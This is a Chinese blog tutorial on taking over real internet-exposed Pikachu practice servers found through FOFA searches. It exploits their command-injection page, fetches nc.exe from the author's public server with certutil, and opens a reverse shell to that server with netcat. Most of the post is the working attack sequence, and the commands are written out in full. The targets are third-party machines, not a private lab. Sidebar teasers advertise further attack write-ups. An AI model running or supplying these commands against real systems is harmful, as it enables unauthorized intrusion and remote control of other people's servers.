实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)

于 2024-04-14 10:07:26 发布
阅读量1k 收藏 15
点赞数 15
文章标签: 服务器 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jnszstmei/article/details/137738169
版权

前言

  1. 本博客仅用于个人复习和学习,无商业用途
  2. 遇到问题,优先在本页搜索,检查是否有相关教程
  3. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者以及本博客无关

0.实验需要

  1. 一台自己的服务器
  2. netcat工具(瑞士军刀)
  3. 能动手操作的决心,不怕困难的决心

1.打开FOFA

FOFA是什么?

FOFA是一款网络空间测绘的搜索引擎,旨在帮助用户以搜索的方式查找公网上的互联网资产。简单来说,FOFA的使用方式类似于谷歌或百度,用户可以输入关键词来匹配包含该关键词的数据。不同的是,这些数据不仅包括像谷歌或百度一样的网页,还包括像摄像头、打印机、数据库、操作系统等资产。

网络空间测绘可以被认为是网络空间的“地图”。就像谷歌地图或高德地图通过卫星图像对地形进行测绘,网络空间测绘也是通过技术探针对全球网络资产进行探测。

然而,网络空间分为公网和内网。FOFA主要针对公网上的资产进行探测,类似于谷歌地图上的建筑物(IP地址),虽然可以看到建筑物的外部结构和规模,但无法了解内部的情况。这是因为侵犯内网的隐私是违法的。(懂的都懂👀)

快速通道👉FOFA

FOFA主界面

FOFA主界面

2.查找pikachu服务器

在搜索框中输入以下代码

"pikachu"&&country="CN"&&title=="Get the pikachu"

随机选择一个服务器进入,点击侧边栏RCE下拉框,找到exec"ping",点击进入

{D3E49BC8-61EB-4eec-AD69-14614714C341}

在ping框中输入127.0.0.1并执行,检测服务器是否能够执行命令,当出现以下页面时,说明该服务器不能执行命令,需要重新更换一个服务器

image-20240331165457614

直至出现以下页面,说明有我们想要的代码执行漏洞存在(可能找的过程会比较漫长,请保持耐心🤡)

image-20240331171346526

3.查看服务器ip地址

输入127.0.0.1&ipconfig或者127.0.0.1&ifconfig进行查看ip地址,如果服务器是windows操作系统,则为127.0.0.1&ipconfig;如果为linux操作系统,则为127.0.0.1&ifconfig,返回如下界面

image-20240331171904747

说明服务器ip地址为10.0.12.10

4.查看服务器文件夹

输入127.0.0.1&dir查看服务器文件夹

image-20240331172219218

5.执行文件下载命令

将nc.exe放在自己的服务器根目录(wwwroot/My_blog)下,这里我的服务器是使用的宝塔界面(按自己实际需求来)

image-20240331173827166

当访问47.109.189.205(我服务器的公网ip)时,会自动下载nc.exe,如下图测试所示

image-20240331173648842

这里出现无法下载是因为我的火狐拦截了nc.exe,所以测试仍然成功

在pikachu服务器上执行自动下载的命令,相关的命令可以去[~]#棱角 ::Edge.Forum* (ywhack.com)上搜索

image-20240331174137541

接着去pikachu服务器上执行生成的命令,从我的服务器上下载nc.exe,并命名为1.exe

127.0.0.1&certutil.exe -urlcache -split -f http://47.109.189.205:80/nc.exe 1.exe

额。。。。。。由于做到一半,别人把服务器关了,我又找不到第二个有该漏洞的服务器,所以以下图片源自网络,如有侵权,请联系我删除

输入127.0.0.1&dir,发现出现1.exe,所以成功让服务器下载到nc.exe

image-20240331181603800

6.在本地服务器上开启监听

输入nc -lvvp 5566,开放5566端口进行监听

image-20240331181734111

7.反弹回显,拿到pikachu服务器控制权

输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权

image-20240331182108462

虽然拿到服务器控制权,但是不要搞破坏,学习为主。

borgeous
关注
  • 15
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
FOFA网络空间搜索引擎使用教程
weixin_30883777的博客
08-09 1万+
FOFA是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 官网:https://fofa.so/ 官方文档:https://fofa.so/help 下面是FOFA的一些简单使用案例: 注意:FOFA搜索关键词不区分大小写 1、搜索页面标题中含有“后台管理”关键词的网站...
docker服务器版搭建pikachu靶场
weixin_41826065的博客
12-07 1161
docker服务器搭建靶场
微议管理系统后台文件上传漏洞
qq_17754023的博客
10-22 907
攻击者可以通过上传木马执行任意命令,获取服务器管理权限。1.使用默认口令admin:admin登录。而且在fofa上搜索存在大量弱口令漏洞。不过貌似看来被大佬复现过了。上传phpinfo文件。
Pikachu漏洞练习平台之SSRF(服务器端请求伪造)
Welcome To Myon'Blog !
11-17 623
file_get_contents() 函数用于将文件的内容读入到一个字符串中,和file() 一样,不同的是 file_get_contents() 把文件读入到一个字符串。关于第一题,curl包含了用于程序开发的libcurl,libcurl支持http、https、ftp、gopher、telnet、dict、file和ldap协议。,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。使用php://filter(用于读取源码)
Pikachu】SSRF 服务器端请求伪造
过期的秋刀鱼
08-21 335
libcurl同时也支持HTTPS认证、HTTP POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP 基于表单的上传、代理、cookies和用户名+密码的认证。,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。PHP支持的由Daniel Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。根据后台使用的函数的不同,对应的影响和利用方法又有不一样。
渗透字典-fofa测绘语句
02-08
在使用fofa搜索引擎时一些常用的搜索语句。
Fofa-gui fofa快速采集工具
01-19
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载
Fofa-collect:Fofa平台采集工具
05-01
Fofa-collectV3.0支持jdk8...javafx.web" -jar "xxx.jar"因为接口问题,删除ip查询功能增加Fofa采集进度条公开工具源码V2.0增加修改账号配置文件增加ip批量查询定位V1.0提供接口查询资产最大支持1000页查询解决页面卡死
fofa-tool FOFA api查询工具复活版
11-22
本工具是FOFA的api查询工具。 1、支持批量的fofa语法查询,线程池支持,速度更快 2、自动分页,每页500条,最大10000条(根据Fofa的会员等级会有所不同) 3、支持导出scv文件 说明:fofa_tool 官网更新了域名,导致...
Fofa-collect:Fofa采集工具
04-03
闲着没事,发现网上的fofa采集工具都不怎么好用,然后自己揉了一个。。。功能查询功能(MD废话)导出功能自动生成icon_hash功能(贼好用)生成icon_hash功能演示博客: :
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
最新发布
2301_79015613的博客
03-14 1034
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
22年10月菠菜平台在野0day
qq_49869351的博客
10-03 1212
fofa平台一抓一大把,直接upload.php爆出来,响应200表示存在。通过burp向upload.php发包,只能post的图片。更改文件头为png,下面跟马。直接回弹路径,webshell连接,完事!给自己记录一下做个备忘!
通过fofa与nmap联动寻找FTP协议漏洞方案
m0_52027565的博客
11-17 756
通过fofa与nmap联动寻找FTP协议漏洞方案 你好哇!我是面包and牛奶——一个堪堪入门的"安全菜鸟",最近通过研究Google语法和伪协议;对FTP协议漏洞具有了一定程度的了解。所以写下这篇博客作为学习记录,并且分享给阅读这篇文章的有缘人! 学习过程谷歌语法 || FTP协议一、使用fofa查找开放21端口的目标二、使用namp爆破1.设置脚本2.攻击总结 谷歌语法 || FTP协议 Google语法产生原因:Google是一个功能强大的搜索引擎,通过预定义命令,可以查询出令...
fofa使用手册笔记
热门推荐
千寻的博客
11-26 1万+
文章目录FOFA介绍FOFA搜索语法常用命令标题中搜索从http头中搜索从html正文中搜索从url中搜索关键字搜索端口搜索IP搜索指定协议类型搜索指定城市的资产搜索指定行政区的资产搜索指定国家(编码)的资产搜索证书(https或者imaps等)中带有的资产搜索操作系统类型搜索服务器版本搜索指定设备名称搜索中国的ip资产高级用法其他规则摘抄免责声明 FOFA介绍 地址https://fofa.so/ FOFA搜索语法 常用命令 标题中搜索 title="后台管理"# 搜索包含“后台管理”的 从htt
任意文件上传之绕过云waf+本地防火墙双重防护
墨痕诉清风的博客
10-28 931
因为这种单位很喜欢将自己的服务器部署在C段的分散的IP上,于是猜测,这个类似官网网站的站点也很有可能就搭建在这个超链接的C段上,我们不妨 host 碰撞一下,如果找到了真实IP的话,那么就可能绕过云 waf。但是这里内容检测还是过不了,但是不会显示云 waf 地址或者 502了,猜测肯定是过了 cdn, 但是不知道是什么拦截住了(可能为本地的硬件防火墙)时,就可以过内容检测,不知道市面上有没有这种类型的webshell,我找了一圈好像都有。尝试了一下,发现content-Encoding居然可以绕过。
谷歌/FOFA搜索引擎使用
莫黎小天
01-21 3810
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的关键字用引号括起来(表示完全匹配,即关键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相关的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相关的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url关键词的网页,如:inurl:login 搜索
网络空间搜索引擎Fofa的简单使用
谢公子的博客
05-29 5706
Fofa Fofa 是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配。例如进行漏洞影响范围分析、应用分布统计、应用流行度等。在渗透测试过程中,Fofa能帮助测试人员快速发现目标资产。 查找使用指定应用的IP app="Coremail" #查找使用Coremail的网站 app="BEA-WebLogic-Server" #查找使用Weblogic的网站 app="CCTV-Cameras"
Fofa的简单使用
汗的博客
05-25 1万+
因为没氪金,没法深入研究,,, 文章目录地址简介查询语法参考基本语法逻辑运算符其他 地址 https://www.fofa.so/ 简介 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、获取一个根域名所有子域名网站、根据IP确认企业、根据一个子域名网站找到跟他在一个IP的其他网站、全网漏洞扫描、一个新的漏洞
fofa-collect怎么安装
10-01
Fofa-collect是一款用于fofa(一个专门用于搜索互联网开放设备的搜索引擎)数据收集的工具。下面是Fofa-collect的安装步骤: 第一步:安装Python 首先,你需要安装Python。你可以从Python官方网站下载合适的Python版本,并按照指示进行安装。确保将Python的路径添加到系统环境变量中。 第二步:安装依赖库 在安装Fofa-collect之前,你需要安装一些依赖库。打开终端或命令提示符窗口,使用pip命令安装所需的库: ``` pip install requests pip install jsonpath pip install termcolor ``` 第三步:下载并安装Fofa-collect 在Github上搜索“fofa-collect”,找到它的仓库,将代码下载到本地。你可以选择使用Git命令行工具进行下载,也可以直接下载ZIP压缩包并解压。 第四步:配置Fofa API 在Fofa的官方网站上注册并登录,获取到API的key。然后,在Fofa-collect的代码文件中找到并修改"config.py"文件,将获取到的API key填入到相应的位置。 第五步:运行Fofa-collect 在终端或命令提示符窗口中,切换到Fofa-collect代码所在的目录,运行以下命令来启动Fofa-collect: ``` python fofa-collect.py ``` 现在,你已经成功安装和运行了Fofa-collect。你可以根据实际需求来使用这个工具进行数据收集和分析。需要注意的是,合法合规的使用和遵守Fofa服务的条款是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值